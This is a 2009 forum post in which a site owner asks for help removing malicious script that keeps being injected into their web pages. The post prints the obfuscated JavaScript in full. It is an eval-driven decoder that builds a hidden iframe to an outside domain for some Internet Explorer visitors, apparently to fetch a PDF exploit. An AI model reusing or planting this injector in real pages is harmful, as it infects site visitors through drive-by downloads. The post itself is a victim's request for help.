PDF Exploit

Discussion in 'Site & Server Administration' started by costi, Aug 12, 2009.

  1. #1
    Hello, recently I had some problems with my server, I don't know how somebody managed to hack some script from my sites and now everytime it adds some malicious code trying to download a pdf4.php from x - daily.com or studiopomelo.com , if you access this sites you will get the same warning from your antivirus, like the one I receive accessing my sites.
    The malicious code is added at the end of the page after </html> or after the body tag. Because of this script now I am blacklisted by google telling me that the site is trying to download malicious code, can anybody give me some suggestions what can I do, how can I get rid of this virus?

    The code that is added is something like this:

    on Fcz4(qwi5, Uly5, YUR2) { var Bap0; Bap0=qwi5.split(Uly5); var vWM8=Bap0.join(YUR2); return vWM8;/**/ } function koF4(Mdc0) { Mdc0 = Fcz4(Mdc0,"##+##","'"); Mdc0 = Fcz4(Mdc0,"##|##","\\"); vWM8=""; myh8 =""; for(k=0;k<Mdc0.length;k++) { vWM8 = Mdc0.charCodeAt(k); if (vWM8==32){vWM8=35} else if (vWM8==35){vWM8=32} else if (vWM8==59){vWM8=64} else if (vWM8==64){vWM8=59} else if (vWM8==37){vWM8=42} else if (vWM8==42){vWM8=37} else if (vWM8>=97 && vWM8<=122) { vWM8=vWM8-97;vWM8=25-vWM8;vWM8+=97; }else if (vWM8>=65 && vWM8<=90) { vWM8=vWM8-65;vWM8=25-vWM8;vWM8+=65; }else if (vWM8>=48 && vWM8<=57) { vWM8=vWM8-48;vWM8=9-vWM8;vWM8+=48; } myh8 += String.fromCharCode(vWM8); } return myh8;/**/ }mnz7=eval;mnz7(koF4('ezi#CNy3#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#BJf9#=###+##ruiznv##+##@'));mnz7(koF4('ezi#Ldq7#=#wlxfnvmg.xivzgvVovnvmg(BJf9)@Ldq7.hvgZggiryfgv(##+##hix##+##,#CNy3)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##drwgs##+##,9)@Ldq7.hvgZggiryfgv(##+##svrtsg##+##,9)@Ldq7.hvgZggiryfgv(##+##yliwvi##+##,9)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));mnz7(koF4('Ldq7.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#GgnC=mzertzgli.fhviZtvmg.glOldviXzhv()@'));mnz7(koF4('ezi#TSFt=GgnC.rmwvcLu(##+##nhrv##+##)@ezi#Hux3=GgnC.rmwvcLu(##+##mg#3.##+##)@ezi#DZQ7=GgnC.rmwvcLu(##+##nhrv#1##+##)@'));if ((GHUg>0)&&(Sfc6==-1)&&(WAJ2==-1)){mnz7(koF4('wlxfnvmg.ylwb.zkkvmwXsrow(Ldq7)@'));}</script>
     
    costi, Aug 12, 2009 IP